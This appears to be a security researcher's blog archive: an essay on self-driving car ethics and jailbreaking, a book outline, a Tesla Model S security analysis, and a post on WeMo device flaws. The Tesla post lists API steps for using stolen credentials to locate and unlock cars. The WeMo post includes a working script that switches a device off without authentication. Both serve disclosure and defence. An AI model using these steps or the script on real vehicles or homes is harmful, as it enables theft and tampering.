Thoughts on Information Security, Technology, and Science

July 03, 2018

Today, the phrase “self driving cars” projects a future where cars will drive themselves. In the future, the same phrase will mean the cars of yesteryear that we had to drive ourselves.

Autonomous vehicles are computers we will put ourselves inside of, and we will depend on them to make our lives safer. These vehicles are crafted by engineers, physicists, and mathematicians; it is to the accuracy of their work that we will entrust our safety. Once that quest is achieved, non-autonomous vehicles are likely to be outlawed on public roadways, given how many fatal car accidents stem from human error. Designated private areas will let manual drivers carry on their hobby, likely to be perceived much like designated smoking rooms at airports: “those weird people huddled together engaged in risky endeavors”. We will look back in time and regard human car drivers with the same puzzlement we reserve for the elevator operators of the past.

Ride share apps like Uber and Lyft will swiftly embrace self driving cars. This will in turn lower the cost of rides to the point where the efficiency of hailing an autonomous car will lead fewer people to purchase their own vehicles. Tesla, however, has a competing business model in which the car switches into taxi mode to earn money for the owner while she is busy at work (Figure 1). Either way, a plot twist on the concept of sole car ownership awaits us.

I have written about software and architectural vulnerabilities in car systems and networks in Chapter 6: Connected Car Security Analysis — From Gas to Fully Electric of my book Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts. These types of security vulnerabilities are a serious risk, and we must strive for further improvement in this area. The scope of this article, however, is to focus on risks that come to light in the realm of cross-disciplinary study: upcoming threat vectors rooted in an understanding of how these vehicles are designed, rather than the application of well-known threat vectors to autonomous car design.

Indeed, the secure design of autonomous vehicle software calls for polymathic thinking: a cross-disciplinary approach that not only invokes the romance of seeking out new knowledge, but also applies a holistic framework of security, one that anticipates new attack vectors going well beyond the traditional security vectors as they may apply to autonomous software.

Polymathic thinking calls upon designers to bring together the realms of philosophy, economics, law, and socio-economic concerns, so that we can align these areas with the concerns of security and safety. As designers and citizens, we need cross-disciplinary conversations to spark progress toward efficiency and safety in autonomous vehicles. This article series is an attempt to ignite that spark, beginning with the issue of morality and how it relates to self-driving cars.

The Trolley Problem

Airline pilots can be faced with emergency situations that require landing at the nearest airport. Should returning to the nearest airport not be feasible, alternative landing sites such as fields or rivers may be an option. Highways, albeit hazardous given power lines, oncoming traffic, and pedestrians, may still be an option for smaller planes. The two-dimensional nature of car driving, on the other hand, mostly lends itself to a split-second brake-or-swerve decision on the part of the driver when it comes to avoiding accidents. In many car accidents, drivers don’t have enough time to survey the situation and make the most rational decision.

When it comes to conversations on avoiding accidents and saving lives, the classic Trolley Problem is oft cited.

Figure 2: The Trolley Problem

Wikipedia describes the problem well:

There is a runaway trolley barreling down the railway tracks. Ahead, on the tracks, there are five people tied up and unable to move. The trolley is headed straight for them. You are standing some distance off in the train yard, next to a lever. If you pull this lever, the trolley will switch to a different set of tracks. However, you notice that there is one person tied up on the side track. You have two options:

Do nothing, and the trolley kills the five people on the main track.

Pull the lever, diverting the trolley onto the side track where it will kill one person.

Which is the most ethical choice?

The utilitarian viewpoint deems it just to pull the lever because it minimizes the number of lives lost. A competing viewpoint holds that pulling the lever constitutes an intentional action that leads to the death of one individual, while doing nothing does not actively contribute to the five deaths that would have happened anyway. The act of pulling a lever to save more lives makes some of us uncomfortable because it makes us active participants in an action that kills.

Many other variants of the Trolley Problem have been put forth as thought experiments, and they are useful in reasoning about the moral decisions that must be made by the developers who write self driving software. There are issues beyond the trolley problem at play, too, such as a vehicle veering off a cliff because of a bug in its software and killing the passengers. Our quest for self driving cars will get us to a world where fewer people die in car accidents, yet some people will still perish for reasons such as software bugs. Who then must be held responsible for accidents and deaths? The individual developer who wrote that specific piece of faulty code? The car company? Legal precedent is unlikely to allow commercial companies to offload repercussions onto the car owner, given that the owner has ceded autonomy to the self driving capabilities.

Rodney Brooks of MIT dismisses the conversation on the Trolley Problem as it pertains to self driving vehicles as “pure mental masturbation dressed up as moral philosophy”. In his essay Unexpected Consequences of Self Driving Cars, Brooks writes:

Here’s a question to ask yourself. How many times when you have been driving have you had to make a forced decision on which group of people to drive into and kill? You know, the five nuns or the single child? Or the ten robbers or the single little old lady? For every time that you have faced such decision, do you feel you made the right decision in the heat of the moment? Oh, you have never had to make that decision yourself? What about all your friends and relatives? Surely they have faced this issue?

And that is my point. This is a made up question that will have no practical impact on any automobile or person for the foreseeable future. Just as these questions never come up for human drivers they won’t come up for self driving cars. It is pure mental masturbation dressed up as moral philosophy. You can set up web sites and argue about it all you want. None of that will have any practical impact, nor lead to any practical regulations about what can or can not go into automobiles. The problem is both non existent and irrelevant.

The fallacy in Brooks’ argument is that he does not take into account the split-second decisioning humans are incapable of when it comes to car accidents. The time our brains take to decide which direction to swerve and when to hit the brakes is too long. Autonomous vehicles, on the other hand, can categorize sensor data and make those decisions within milliseconds.

On March 18, 2018, an Uber autonomous test vehicle struck a pedestrian, who died of her injuries. The Uber vehicle had one vehicle operator in the car and no passengers. The preliminary report from the National Transportation Safety Board (NTSB) states:

According to data obtained from the self-driving system, the system first registered radar and LIDAR observations of the pedestrian about 6 seconds before impact, when the vehicle was traveling at 43 mph. As the vehicle and pedestrian paths converged, the self-driving system software classified the pedestrian as an unknown object, as a vehicle, and then as a bicycle with varying expectations of future travel path. At 1.3 seconds before impact, the self-driving system determined that an emergency braking maneuver was needed to mitigate a collision. According to Uber, emergency braking maneuvers are not enabled while the vehicle is under computer control, to reduce the potential for erratic vehicle behavior. The vehicle operator is relied on to intervene and take action. The system is not designed to alert the operator.

It is clear from the NTSB report that Uber’s autonomous software classified the pedestrian more accurately as it approached: first an “unknown object”, then “a vehicle”, and finally a “bicycle”, which was accurate because the victim of the accident was crossing the road with her bicycle. The emergency braking system was disabled in this case, ultimately leading to the accident, and the car did not even alert the operator (by design). It is not yet clear when the vehicle would have started braking (6 seconds prior versus 1.3 seconds) had the automatic braking feature been enabled. Nonetheless, if the system had been enabled, the software would have had to make the call on when to apply the brakes, likely through a combination of manual tuning and machine learning.
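The 43 mph, 6-second, and 1.3-second figures from the report support a quick back-of-the-envelope check of why the late braking decision mattered. The speed and timings below come from the NTSB report; the 7 m/s² deceleration is our own assumption (a typical dry-road emergency braking figure), not a number from the report.

```python
# Sketch: how far away was the pedestrian at each decision point, and
# what stopping distance does physics demand at 43 mph?
MPH_TO_MPS = 0.44704

def distance_travelled(speed_mph: float, seconds: float) -> float:
    """Distance covered at constant speed, in meters."""
    return speed_mph * MPH_TO_MPS * seconds

def stopping_distance(speed_mph: float, decel_mps2: float = 7.0) -> float:
    """Distance needed to brake to a full stop: v^2 / (2a), in meters."""
    v = speed_mph * MPH_TO_MPS
    return v * v / (2 * decel_mps2)

if __name__ == "__main__":
    print(f"First detection (6 s out):    {distance_travelled(43, 6.0):.0f} m away")
    print(f"Braking decision (1.3 s out): {distance_travelled(43, 1.3):.0f} m away")
    print(f"Distance needed to stop:      {stopping_distance(43):.0f} m")
```

Under these assumptions, the car was roughly 115 m away at first detection but only about 25 m away at the 1.3-second mark, which is less than the distance needed to stop from 43 mph: by then, a full stop was no longer physically possible.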

Machine learning systems can classify objects in images with impressive accuracy: the average human error rate on the ImageNet benchmark is 5.1%, while machine learning algorithms have achieved an error rate of 2.251%. The self driving Uber was probably using a combination of region-based convolutional neural networks (R-CNNs) to detect objects in near real time. It is unknown what classification or segmentation algorithms were employed in the case of the accident, and a self driving car runs many more algorithms than object classifiers; even so, it is evident that the hardware and software technology in self driving cars surpass the physics of human senses.

We need to bring the issue of machine decisioning to the forefront if we are going to make any headway toward making our autonomous vehicle future safe. Brooks’ argument dismisses the need for such decisioning outright, yet we have evidence today that this is one of the more important issues we ought to solve in a meaningful manner. Brooks is right in saying that humans in control of a car almost never have the ability to decide whom to drive into and kill, but his argument doesn’t account for the technical abilities of autonomous car computers, which will make it possible for software to make these decisions.

Back to the topic of the Trolley Problem: engineers must account for decisions when a collision is unavoidable. These decisions will have to select from predictable outcomes, such as steering the vehicle to the left to minimize impact. They will also include situations that could save the lives of the car’s passengers while endangering people outside of the vehicle, such as pedestrians or the passengers of another vehicle. Should the car minimize the total loss of life, or should it prioritize the lives of its own passengers?
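To make the question concrete, here is a deliberately toy sketch of what such a policy choice could look like in code. The maneuver names and casualty estimates are entirely hypothetical, and nothing suggests any manufacturer uses scoring this simple; the point is only that a single weighting parameter encodes the utilitarian-versus-passenger-first choice.

```python
# Toy policy: pick the maneuver with the lowest weighted casualty cost.
# passenger_weight = 1.0 is the utilitarian policy (all lives equal);
# passenger_weight > 1.0 encodes a self-protective, passenger-first policy.
def choose_maneuver(options, passenger_weight=1.0):
    """options: list of (name, passengers_at_risk, bystanders_at_risk)."""
    cost = lambda o: o[1] * passenger_weight + o[2]
    return min(options, key=cost)[0]

options = [
    ("swerve_into_barrier", 1, 0),  # risks one passenger, no bystanders
    ("continue_straight",   0, 2),  # risks two pedestrians
]

print(choose_maneuver(options))                        # prints "swerve_into_barrier"
print(choose_maneuver(options, passenger_weight=5.0))  # prints "continue_straight"
```

With equal weights the car sacrifices its passenger to save two pedestrians; with the passengers weighted more heavily, the same code protects the occupant. The moral calculus lives entirely in a number someone must choose.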

Figure 3: MIT’s Moral Machine

The Moral Machine project at MIT is an effort to illustrate the moral dilemmas we are likely to face and have to “program in”. Their website includes a list of interactive dilemmas relating to machine intelligence (Figure 3).

Imagine a case where the car computes that a collision is imminent and it must swerve to the right or to the left. The car’s sensors quickly recognize a cyclist on the right and another on the left, the difference being that the cyclist on the left is not wearing a helmet. Should the car be programmed to swerve left because the cyclist on the right is deemed “more responsible” for wearing a helmet (and who must conjure up this moral calculus?)? Or should it pick a side at random? Autonomous cars will continuously observe the objects around them. What of the case where the car is able to scan the license plate of a nearby vehicle and classify drivers as good or bad based on collision history? Perhaps this information could be useful in navigating around rogue drivers with a demonstrated history of bad driving, but should the same information be leveraged to decide whom to collide with and kill should an unavoidable collision occur?

Make it Be Utilitarian (But Not My Car)

On the topic of collision decisioning, does the general population of today prefer a utilitarian self driving vehicle? Jean-François Bonnefon et al., in their paper The social dilemma of autonomous vehicles, came up with the following analysis:

Autonomous Vehicles (AVs) should reduce traffic accidents, but they will sometimes have to choose between two evils-for example, running over pedestrians or sacrificing itself and its passenger to save them. Defining the algorithms that will help AVs make these moral decisions is a formidable challenge. We found that participants to six MTurk studies approved of utilitarian AVs (that sacrifice their passengers for the greater good), and would like others to buy them, but they would themselves prefer to ride in AVs that protect their passengers at all costs. They would disapprove of enforcing utilitarian AVs, and would be less willing to buy such a regulated AV. Accordingly, regulating for utilitarian algorithms may paradoxically increase casualties by postponing the adoption of a safer technology.

The findings are not surprising. It is straightforward to grasp the utilitarian viewpoint from an intellectual perspective, yet all bets are off when the situation includes ourselves and our loved ones. Still, the design of autonomous vehicles has spawned a moral challenge humankind has not faced before: we must settle on a solution to this moral dilemma, design for it, and operationalize on unconscious hardware a system that will decide who is worthy of living.

In the absence of federal regulations, car companies may let the owner select from various types of decisions, or manufacturers may offer the prioritization of passenger lives as part of a luxury upgrade package, skewing favor toward the population able to afford it. Figure 4 depicts a mockup of the Tesla iPhone app allowing the owner to toggle such a setting on or off.

It is plausible to imagine federal regulations that compel a utilitarian mode to be permanently in effect. In such a world, the incentive for car owners to ‘jailbreak’, i.e. subvert the factory default software, will be high, so as to prioritize the protection of their own lives. This sort of jailbreaking can extend to protocols designed for cooperation; for example, two cars halting at a stop sign simultaneously. An industry-accepted protocol could propose a simple solution (in the case of 2 cars) where the cars engage in a digital coin toss and the winner goes first. If people were to jailbreak their car software to subvert this functionality and always go first, the result could be confusion, and perhaps collisions, if every other car owner were to circumvent the protocol in the same way.
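A digital coin toss between two mutually distrusting cars can be sketched with a standard commit-then-reveal scheme, so that neither party can wait for the other’s bit and cheat. This is a minimal illustration, not a proposed standard; a real vehicle-to-vehicle protocol would also need signatures, identities, and replay protection.

```python
# Commit-reveal coin toss: each party commits to a random bit before
# either reveals, so neither can choose its bit after seeing the other's.
import hashlib
import secrets

def commit(bit: int) -> tuple[bytes, bytes]:
    """Return (commitment, opening) for a single bit."""
    nonce = secrets.token_bytes(16)
    opening = nonce + bytes([bit])
    return hashlib.sha256(opening).digest(), opening

def verify(commitment: bytes, opening: bytes) -> int:
    """Check an opening against its commitment and recover the bit."""
    if hashlib.sha256(opening).digest() != commitment:
        raise ValueError("peer changed its bit after committing")
    return opening[-1]

# Each car picks a random bit and exchanges commitments first...
bit_a, bit_b = secrets.randbelow(2), secrets.randbelow(2)
commit_a, open_a = commit(bit_a)
commit_b, open_b = commit(bit_b)

# ...then both reveal, and the XOR of the bits decides who goes first.
winner = "car A" if verify(commit_a, open_a) ^ verify(commit_b, open_b) == 0 else "car B"
print(winner, "goes first")
```

A jailbroken car cannot bias this toss by lying at reveal time, because a changed bit no longer matches its commitment; it can only refuse to play, which is itself detectable.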

Lessons of Pegasus

The term ‘jailbreak’ was coined by communities that have worked to modify iOS, the operating system that powers iPhones and iPads. Apple asserts tight controls over its devices, which people in the jailbreak community circumvent so that they can further customize their devices and add features not offered by Apple.

In 2016, the security community was alerted to a sophisticated piece of iOS spyware named Pegasus, found by Bill Marczak and engineers at the security company Lookout. An activist friend of Marczak’s located in the United Arab Emirates forwarded him a suspicious SMS message containing an Internet link that, when clicked, led to the immediate installation of spyware. Upon analysis, it became evident that the spyware leveraged three vulnerabilities in iOS to remotely exploit an iPhone and gain full control. Numerous attribution theories circulate around this incident, the most notable pointing to the NSO Group, an Israeli spyware company. Researchers found references to NSO in the Pegasus source code, along with evidence that, in addition to the targeting of Ahmed Mansoor in the UAE, the exploit was aimed at Mexican journalist Rafael Cabrera, and quite possibly at additional targets in Israel, Turkey, Thailand, Qatar, Kenya, Uzbekistan, Mozambique, Morocco, Yemen, Hungary, Saudi Arabia, Nigeria, and Bahrain.

Remotely exploitable vulnerabilities in iOS are sought after not only because iPhones and iPads enjoy a healthy market share, but also because finding such vulnerabilities in Apple’s products is harder. Apple’s iOS Security Guide document emphasizes system security: utmost care is taken to make sure that only authorized source code is executed by the devices and that various security mechanisms work in tandem to make remotely exploitable conditions difficult to achieve.

In my book Abusing the Internet of Things, I have outlined the nature of the Controller Area Network (CAN) architecture in cars, which in essence is a computer network where every physically connected computer is fully trusted. Electronic Control Units (ECUs) are the various computers in the car that relay sensor information and command other ECUs to take specific actions. Traditionally, attack vectors targeting such an architecture have required physical access to the car. With the prevalence of telematics systems that employ cellular communications, essentially putting modern cars on the Internet, the CAN architecture no longer provides reasonable security assurance: should an external hacker exploit a flaw in the telematics software, she could then remotely control the rest of the car. Such a scenario can have exponential impact should the attacker choose to infect and command cars en masse. Elon Musk has publicly stated that such a fleet-wide hack is one of his concerns.
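The trust model is easy to see at the frame level. A minimal sketch, assuming the classic CAN 2.0A layout: a frame carries only an arbitration ID and up to 8 data bytes, with no sender field and no authentication, so any node on the bus can emit any ID. The IDs and payload below are made up for illustration.

```python
# Simplified CAN 2.0A frame packing: 11-bit arbitration ID, DLC, payload.
# Note what is absent: no sender identity, no signature, no MAC.
import struct

def can_frame(arbitration_id: int, data: bytes) -> bytes:
    if arbitration_id > 0x7FF or len(data) > 8:
        raise ValueError("11-bit ID and at most 8 data bytes")
    return struct.pack(">HB", arbitration_id, len(data)) + data

# A legitimate ECU and a compromised telematics unit produce
# byte-identical frames for the same ID; receivers cannot tell them apart.
legit = can_frame(0x244, b"\x00\x32")  # hypothetical speed message
spoof = can_frame(0x244, b"\x00\x32")
print(legit == spoof)  # prints True
```

This is why a single remotely compromised ECU can impersonate any other node on the bus: trust is conferred by physical connection alone.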

As with iOS devices, remotely exploitable vulnerabilities not only allow hackers to access and command the infected device, but also to jailbreak it and subvert functionality. Circling back to our discussion of “programming in” moral rulesets per federal regulations: security vulnerabilities could allow individuals to jailbreak their autonomous vehicles and bypass these controls.

Rumors that Apple is building an autonomous vehicle have circulated in the media for a few years now. A case could be made, albeit speculatively, that Apple may have an advantage in operationalizing an architecture that makes it difficult to bypass the security controls built into the product. In more tangible news, companies such as General Motors have appointed executives to oversee the secure design and architecture of their vehicles.

An argument can be made in favor of vehicle jailbreaking in humanitarian situations, for example where journalists may be assigned vehicles that prohibit access to certain areas. These situations will have to be carefully weighed against the double-edged nature of implementing security mechanisms that are hard to circumvent.

Relentless Optimism

The prevalence of autonomous vehicles is going to bring moral dilemmas into our lives that have traditionally been confined to the province of academic contemplation. The transformative and disruptive nature of these technologies is bound to ignite legal discussions and precedents that may advance, or even temporarily slow down, the adoption of self driving cars.

The compute power of self driving cars will put us in a position to lower the death rates due to vehicle collisions, yet we are bound to be faced with deaths due to unavoidable collisions. In other words, fewer people will die, but they will die for reasons foreign to our emotional faculties: software bugs, non-compliance due to circumvention of programmed moral controls, unfair moral controls and the lack of regulation, and many unforeseen reasons that we will uncover.

The status quo of 1.25 million global deaths per year due to road traffic crashes is not acceptable. Add to this number the suffering of the countless people injured in crashes, not to mention the hours spent commuting that people could instead spend doing constructive things and having meaningful conversations. It is clear that our advancements in technology are the way to achieve improvements that will benefit us greatly, and while we may have misgivings on our way to success, the notion that we are moving toward betterment ought to fill us with unbounded and relentless optimism for the years ahead.

February 10, 2016

“The book is written in a spritely, writerly fashion, with many grace notes and interesting case studies -- including an account of how you could use someone's hacked email account to steal their Tesla automobile.

“This book is a marvelous thing: an important intervention in the policy debate about information security and a practical text for people trying to improve the situation.”

The book begins with a deep dive into the design and architecture of one of the more popular IoT products available in the market: the Philips hue personal lighting system. This chapter presents various security issues in the system, including fundamental concerns such as password security and the possibility of malware abusing weak authorization mechanisms to cause sustained blackouts. We also discuss the complexity of internetworking our online spaces (such as Facebook) with IoT devices, which can lead to security issues spanning multiple platforms.

This chapter takes a look at the security vulnerabilities surrounding existing electronic door locks, their wireless mechanisms, and their integration with mobile devices. We also present actual case studies of attackers who have exploited these issues to conduct robberies.

Chapter 3: Assaulting the Radio Nurse—Breaching Baby Monitors and One Other Thing

Security defects in remotely controllable baby monitors are covered in this chapter. We take a look at details of actual vulnerabilities that have been abused by attackers and show how simple design flaws can put the safety of families at risk.

Companies like SmartThings sell suites of IoT devices and sensors that can be leveraged to protect the home, such as by receiving a notification of a potential intruder if the main door of a home is opened after midnight. The fact that these devices use the Internet to operate has increased our dependency on network connectivity, thereby blurring the lines between our physical world and the cyber world. We take a look at the security of the SmartThings suite of products and explore how they are designed to securely operate with devices from other manufacturers.

Chapter 5: The Idiot Box—Attacking “Smart” Televisions

Televisions today are essentially computers running powerful operating systems such as Linux. They connect to the home WiFi network and support services such as watching streaming video, videoconferencing, social networking, and instant messaging. This chapter studies actual vulnerabilities in Samsung branded TVs to understand the root causes of the flaws and the potential impacts on our privacy and safety.

Chapter 6: Connected Car Security Analysis—From Gas to Fully Electric

Cars are also “things” that are now accessible and controllable remotely. Unlike with many other devices, the interconnectedness of the car can serve important safety functions — yet security vulnerabilities in cars can lead to the loss of lives. This chapter studies a low-range wireless system, followed by a review of extensive research performed by leading experts in academia. We analyze and discuss features that can be found in the Tesla Model S sedan, including possible ways the security of the car could be improved.

Chapter 7: Secure Prototyping—littleBits and cloudBit

The first order of business when designing an IoT product is to create a prototype, to make certain the idea is feasible, to explore alternative design concepts, and to develop specifications to build a solid business case. It is extremely important to design security in the initial prototype and subsequent iterations toward the final product. Security as an afterthought is bound to lead to finished products that put the safety and privacy of the consumers at risk. In this chapter, we prototype an SMS doorbell that uses the littleBits prototyping platform. The cloudBit module helps us provide remote wireless connectivity, so we can prototype our IoT idea to send an SMS message to the user when the doorbell is pressed. Discussion of the prototype steps through security issues and requirements considered when designing the prototype, and we also discuss important security considerations that should be addressed by product designers.

Over the next few years, our dependence on IoT devices in our lives is bound to skyrocket. In this chapter, we predict plausible scenarios of attacks based upon our understanding of how IoT devices will serve our needs in the future.

Chapter 9: Two Scenarios—Intentions and Outcomes

In this chapter, we take a look at two different hypothetical scenarios to gain a good appreciation of how people can influence security incidents. In the first scenario, we explore how an executive at a large corporation attempts to leverage the “buzz” surrounding the topic of IoT security with the intention of impressing the board of directors. In the second scenario, we look at how an up-and-coming IoT service provider chooses to engage with and respond to researchers and journalists, with the intention of preserving the integrity of its business. The goal of this chapter is to illustrate that, ultimately, the consequences of security-related scenarios are heavily influenced by the intentions and actions of the people involved.

The innovation behind Tesla’s electric vehicles has set us in the right direction towards a more sustainable future. What Elon Musk is doing with Tesla and SpaceX is inspirational and a triumph for humankind.

Given the fantastic future of IoT (Internet of Things) devices ahead of us, it is the responsibility of the security community and device manufacturers to do our best to enable these devices securely. The IoT devices in scope include remotely controllable thermostats, baby monitors, light bulbs, door locks, cars, and many more. The impact of security vulnerabilities targeting such devices can be physical in nature, in addition to contributing to loss of privacy.

The purpose of this document is to outline the mechanisms by which the Tesla Model S communicates with car owners and the Tesla infrastructure using a variety of TCP/IP mechanisms. The goal of this document is to advise the owners on security issues they should be aware of as well as to kick off a dialogue between security researchers and Tesla Motors that will ultimately drive deeper analysis and assurance.

The Tesla Model S P85+

The Tesla Model S is currently configurable with the following options:

The Tesla Model S is fully electric. In addition to charging stations available in most metro areas, it can also be charged for free (for life) at any of the Tesla Supercharging stations.

Figure 2: The center display.

The center display depicted in Figure 2 is one of the most popular features of the car. The display not only lets you control media, access navigation, and turn on the rear view camera, but also lets you adjust the suspension, open the panoramic roof, lock and unlock doors, and adjust the height and braking of the vehicle. This is all done via the touch screen.

The Tesla Model S is a truly innovative product. In the next section, we will take a look at some preliminary security issues that may be helpful to owners as well as to other security researchers to assist with deeper level analysis.

Threats

In this section, we will discuss potential security issues.

1. Six-character password can lead to the car being located and unlocked via malware, phishing, and password leaks.

The password requirement for a new user account is 6 characters with at least one number and one letter (Figure 3).
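A rough sense of the keyspace this minimum implies can be computed directly. This is a worst-case estimate under assumptions of our own: exactly six characters from a case-insensitive alphanumeric set of 36 symbols; the site may well permit longer passwords and more symbol types.

```python
# Count six-character alphanumeric passwords with at least one letter
# and at least one digit, via inclusion-exclusion.
import math

def keyspace(length: int, alphabet: int = 36) -> int:
    total = alphabet ** length
    letters_only = 26 ** length  # violate "at least one number"
    digits_only = 10 ** length   # violate "at least one letter"
    return total - letters_only - digits_only

n = keyspace(6)
print(f"{n:,} candidate passwords (~{math.log2(n):.0f} bits of entropy)")
```

Roughly 1.9 billion candidates, about 31 bits of entropy: far too small to resist an offline or unthrottled online guessing campaign against a high-value account.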

Figure 4: Tesla Model S iPhone App

Once the car is delivered, the user can use the iOS app to control the car, inclusive of unlocking the car, checking on the car’s location and charge status (Figure 4).

The following are the implications as a result of this design:

1. Brute-force attacks: The Tesla website doesn’t appear to have any account lockout policy for incorrect login attempts. This puts owners at risk, since a malicious entity can attempt to brute-force the account password and gain access to the iPhone app functionality.

2. Phishing attacks: Given that the only control around the iPhone app is a password, the situation is ripe for attackers to steal credentials using phishing attacks. Once credentials are gathered, phishers can easily check the location of the cars for the accounts they have compromised by using the Tesla REST API (documented at http://docs.timdorr.apiary.io; endpoints hosted at https://portal.vn.teslamotors.com/) by following these steps:

A. Login by submitting to /login and setting the user_session[email] and user_session[password] parameters.

B. Use the session token from A. to obtain the vehicle list by submitting a GET request to /vehicles.

C. Use the vehicle id obtained in B. to query the location of the vehicle by submitting a GET request to /vehicles/{id}/command/drive_state. This will return the location in the form of latitude and longitude.

Once the phisher has obtained the locations of the vehicles mapped to the compromised accounts, he or she can unlock a particular vehicle or a set of vehicles (by invoking the following in a loop): a GET request to /vehicles/{id}/command/door_unlock.

3. Malware attacks: Future generations of malware are likely to pick up static 1-factor passwords pertaining to vehicles such as the Tesla and ferry them to botnet herders, giving them substantial power to locate and control (unlock, for example) vehicles.

4. Password leaks: Users have a tendency to re-use their credentials across services. This creates a situation where an attacker who has compromised a major website can attempt the same credentials on the Tesla website and iPhone app. We also see major password leaks on a daily basis. An attacker can easily take usernames and passwords from such leaks and attempt to log in to the Tesla iOS app (or automate the process described in 2. using the REST API) to locate and unlock cars.

5. Social engineering and Tesla employees: In addition to these issues, it is widely known amongst Tesla owners that Tesla customer service has the ability to unlock cars remotely. It is unclear what consistent requirements owners must go through to verify their identity. Without clear requirements, it is possible that a malicious entity could socially engineer Tesla customer service into unlocking someone else’s car. It is also unclear what background checks Tesla employees are subject to prior to being given the power to unlock any Tesla car.

6. Email account compromise: Any user with temporary access to the owner’s email can reset the owner’s password; the user is not required to answer any secret questions or provide any additional information. Given the cost of a car such as the Tesla Model S and the physical consequences of theft of material inside the car, it is recommended that owners protect their email accounts by:

A. Setting up a separate GMail account that is not tied to any other service and enabling 2-factor authentication.

B. Linking this GMail address to their Tesla profile.

On a somewhat positive note, the Tesla website incorporates an anti-CSRF token (form_token), which prevents a malicious website from taking over the user’s account by invoking a POST request to the /user/me/edit functionality that lets users change their password and username.

The Tesla iOS app uses a REST API to communicate with and send commands to the car. Tesla has not intended for this API to be directly invoked by third parties. However, third-party apps have already started to leverage the Tesla REST API to build applications.

As an example, The Tesla for Glass application lets users monitor and control their Teslas using Google Glass.

To set up this application, Google Glass owners have to authorize and add the app. Once this step is complete, the user is redirected to a login page as shown in Figure 5. On this page, the user enters their http://www.teslamotors.com/ login information.

Figure 6: Tesla website credentials are collected by third party app

As shown in Figure 6, user credentials are sent to teslaglass.appspot.com. It can therefore be assumed that the third party is using the user credentials to invoke the Tesla REST API on behalf of the user. This means the third party holds the owner’s full Tesla credentials, with all of the location and control capabilities described above.

In the meantime, Tesla owners are strongly encouraged not to use third-party applications.

Potential Low Hanging Fruit

The Tesla connects outbound via 3G and can also hop onto a local Wi-Fi network.

Figure 7: Capture of outbound connection from Tesla Model S on Wi-Fi

When the Model S is configured to use Wi-Fi, it was noted that it established an outbound connection to 209.11.133.29 using the OpenVPN protocol. It was also noted that an HTTP HEAD request was issued to 23.209.17.60, which resulted in a 400 Bad Request response.

- The majority of the data observed by plugging into the connector appears to be broadcast UDP packets carrying car status information.

Here are the potential implications and low hanging fruit:

- The outgoing OpenVPN connection can be configured using pre-shared keys, username and password, or certificates. It will be interesting to see where in the internal filesystem this information is located. Once this information is obtained, a potential intruder could test the internal network infrastructure of the OpenVPN endpoint and also the integrity of how software updates are performed.

- It is currently unclear if the UDP broadcast data can be abused to coerce the car into settings that could be potentially dangerous and/or to override safety precautions.

- The exposure of the raw internal network just by plugging in appears dangerous in the case where a malicious valet service abuses temporary physical access.
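For reference, the three OpenVPN authentication modes mentioned above correspond to distinct client-side directives, so a configuration fragment recovered from the car’s filesystem would immediately reveal which mode is in use. The fragments below are illustrative examples of standard OpenVPN syntax, not material taken from the vehicle:

```
# Static pre-shared key:
secret static.key

# Username/password authentication:
auth-user-pass credentials.txt

# Certificate-based authentication:
ca ca.crt
cert client.crt
key client.key
```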

Conclusions

Based on the issues outlined in this document, the following are the take-away points:

1. Tesla should address the issue of using static passwords with low complexity requirements.

2. Tesla owners should be aware of risks based on the current situation and take precautions outlined in this document.

3. Until Tesla announces an SDK and methods they are going to outline to sandbox applications, users should refrain from using third party applications.

4. The forum discussion referred to in the Low Hanging Fruit section is fascinating. It is clear that Tesla owners want to engage in an open dialogue in which Tesla assures them of the security architectures being utilized to secure the cars. This is analogous to how Apple described how the iMessage infrastructure is secured to put personal and corporate users at ease.

The Tesla Model S is a great car and a fantastic product of innovation. Owners of Teslas, as well as other cars, are increasingly relying on information security to protect the physical safety of their loved ones and their belongings. Given the serious nature of this topic, we know we can’t attempt to secure our vehicles the way we have secured our workstations at home in the past, by relying on static passwords and trusted networks. The implications for physical security and privacy in this context have raised the stakes to the next level.

Tesla has demonstrated innovation leaps and bounds beyond other car manufacturers. It is hoped that this document will encourage owners to think deeply about doing their part, and Tesla to have an open dialogue with its owners on what it is doing to take security seriously.

October 22, 2013

It’s been a decade since we accepted the idea that the perimeter strategy to security is ineffective: endpoints must strive to protect their own stack rather than rely on their network segment being completely trustworthy. However, this notion has mostly permeated only the corporate space. Even so, businesses are still struggling to implement controls in this area given the legacy of flat networks and operating system design.

When it comes to residences, the implicit notion is that controls beyond Network Address Translation (NAT) aren’t immediately necessary from the perspective of cost and complexity. The emergence of Internet of Things (IoT) is going to dramatically change this notion.

In the case of the baby monitor, one glaring design issue was that anyone with one-time access to the local Wi-Fi where the monitor is installed can listen in without authentication, and can continue to listen in remotely. This is also called out by Amazon reviewer Lon J. Seidman in his review titled "Poor security, iOS background tasks not reliable enough for child safety":

"...But that's not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any iOS device on your network to connect to it and listen in without a password. If that's not bad enough, when an iPhone has connected once on the local network it can later tune into the monitor from anywhere in the world".

Figure 3: Demonstration of WeMo baby app concern

I've demonstrated the issue Seidman points out in the video above. The paper goes into more technical detail.

Figure 4: Demonstration of malware turning the WeMo switch off

In the case of the WeMo switch, it was found that any local device can turn it off without any additional authorization. In the paper, I describe how to write a script to do this.
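The core of the problem is that the switch’s UPnP "basicevent" SOAP endpoint performs no authorization at all. The sketch below (in Python, not the original script from the paper) shows how any host on the LAN could construct and send the SetBinaryState command; the port 49153 and endpoint path are typical for WeMo firmware but should be treated as assumptions here.

```python
import http.client

SOAP_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<s:Body>'
    '<u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent:1">'
    '<BinaryState>{state}</BinaryState>'
    '</u:SetBinaryState>'
    '</s:Body>'
    '</s:Envelope>'
)

def build_request(state):
    """Build (headers, body) for a SetBinaryState SOAP call (0 = off, 1 = on)."""
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPACTION": '"urn:Belkin:service:basicevent:1#SetBinaryState"',
    }
    return headers, SOAP_BODY.format(state=state)

def switch_off(device_ip, port=49153):
    """POST the 'off' command to a WeMo switch on the local network."""
    headers, body = build_request(0)
    conn = http.client.HTTPConnection(device_ip, port, timeout=5)
    conn.request("POST", "/upnp/control/basicevent1", body, headers)
    return conn.getresponse().status
```

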